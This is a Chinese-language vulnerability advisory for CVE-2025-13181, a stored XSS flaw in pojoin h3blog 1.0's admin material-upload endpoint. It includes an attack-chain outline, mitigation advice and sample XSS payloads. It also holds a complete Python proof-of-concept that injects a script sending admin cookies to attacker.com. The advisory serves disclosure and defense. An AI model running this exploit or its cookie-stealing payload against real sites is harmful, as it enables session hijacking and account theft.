CVE-2025-13181: pojoin h3blog 1.0跨站脚本(XSS)漏洞

漏洞信息

漏洞编号

CVE-2025-13181

漏洞类型

XSS (跨站脚本攻击)

CVSS评分

3.5 低危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

pojoin h3blog 1.0

漏洞概述

CVE-2025-13181是pojoin h3blog 1.0版本中存在的一个存储型跨站脚本(XSS)漏洞。该漏洞位于后台管理系统的素材管理功能中，具体受影响的是/admin/cms/material/add接口的文件上传功能。攻击者可以通过在素材名称(Name)参数中注入恶意JavaScript代码，当其他管理员访问素材列表或相关页面时，恶意脚本将在受害者浏览器中执行。这可能导致会话劫持、敏感信息窃取、篡改页面内容或进行钓鱼攻击。由于该漏洞需要低权限认证且需要用户交互才能触发，因此被评定为低危级别。漏洞已于2025年11月14日公开披露，pojoin h3blog是一个基于Java开发的博客系统，该漏洞影响其后台素材管理模块的安全性。

技术细节

该漏洞属于存储型XSS(Stored XSS)类型，攻击向量为Web应用安全漏洞。在pojoin h3blog 1.0的后台管理系统中，素材上传功能(/admin/cms/material/add)未对用户输入的Name参数进行充分的输入验证和输出编码。攻击者可以在素材名称字段中注入恶意HTML或JavaScript代码，如<script>alert(document.cookie)</script>或<img src=x onerror=alert(1)>等Payload。提交的恶意代码会被存储在数据库中，当其他管理员或用户访问素材列表时，服务器从数据库取出数据并直接返回给客户端浏览器执行。由于该接口位于后台管理路径(/admin/)，需要认证用户才能访问，因此攻击面相对有限。漏洞的CVSS向量显示攻击复杂度低(AC:L)，但需要低权限用户认证(PR:L)和用户交互(UI:R)才能成功利用。攻击者首先需要登录后台系统，然后访问素材上传功能并提交恶意Payload，最后诱导其他管理员访问相关页面触发脚本执行。

攻击链分析

STEP 1

1. 信息收集

攻击者识别目标网站使用pojoin h3blog 1.0系统，并通过目录扫描发现/admin/cms/material/add接口

STEP 2

2. 认证获取

攻击者通过暴力破解、默认凭证或社工手段获取后台低权限用户账号

STEP 3

3. 恶意Payload注入

攻击者登录后台访问素材上传功能，在Name参数中注入XSS恶意代码并提交

STEP 4

4. 持久化存储

恶意代码被存储到数据库中，成为素材名称的一部分，在系统中持久存在

STEP 5

5. 诱导受害者访问

攻击者诱导其他管理员或用户访问素材列表页面，触发存储的恶意脚本执行

STEP 6

6. 攻击成功

恶意JavaScript在受害者浏览器中执行，可窃取Cookie、会话令牌或进行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys
from urllib.parse import quote

# CVE-2025-13181 PoC - Stored XSS in pojoin h3blog 1.0
# Target: /admin/cms/material/add
# Parameter: Name

def exploit_xss(target_url, username, password):
    """
    Exploit stored XSS vulnerability in pojoin h3blog 1.0
    """
    login_url = f"{target_url}/admin/login"
    upload_url = f"{target_url}/admin/cms/material/add"
    
    # XSS Payload - Cookie stealing example
    xss_payload = '<script>fetch("https://attacker.com/log?c="+document.cookie)</script>'
    
    # Step 1: Login to admin panel
    session = requests.Session()
    login_data = {
        'username': username,
        'password': password
    }
    
    try:
        login_response = session.post(login_url, data=login_data)
        
        # Step 2: Upload material with XSS payload in Name field
        upload_data = {
            'Name': xss_payload,
            'Type': 'image',
            'Description': 'Test material'
        }
        
        upload_response = session.post(upload_url, data=upload_data)
        
        if upload_response.status_code == 200:
            print(f"[+] XSS Payload submitted successfully")
            print(f"[+] Payload: {xss_payload}")
            print(f"[+] When admin views material list, script will execute")
        else:
            print(f"[-] Upload failed with status: {upload_response.status_code}")
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    if len(sys.argv) < 4:
        print(f"Usage: python {sys.argv[0]} <target_url> <username> <password>")
        print(f"Example: python {sys.argv[0]} http://localhost:8080 admin admin123")
        sys.exit(1)
    
    exploit_xss(sys.argv[1], sys.argv[2], sys.argv[3])

影响范围

pojoin h3blog 1.0

防御指南

临时缓解措施

在官方修复补丁发布前，可采取以下临时缓解措施：1)限制后台管理功能的访问IP，仅允许内网访问；2)增强管理员密码策略，定期更换密码；3)在Web应用防火墙(WAF)中配置XSS防护规则，对/admin/cms/material/add接口的Name参数进行过滤；4)使用输入验证库对所有用户输入进行清理和转义；5)监控访问日志，及时发现异常的上传行为和脚本执行尝试；6)对管理员进行安全意识培训，警惕钓鱼攻击和会话劫持风险。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-13181
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-13181
3 Details https://www.cvedetails.com/cve/CVE-2025-13181/
4 VulDB https://vuldb.com/cve/CVE-2025-13181
5 Link https://github.com/caigo8/CVE-md/blob/main/h3blog/xss4.md
6 Link https://github.com/caigo8/CVE-md/blob/main/h3blog/xss4.md#vulnerability-reproduction
7 Link https://vuldb.com/?ctiid.332471
8 Link https://vuldb.com/?id.332471
9 Link https://vuldb.com/?submit.684887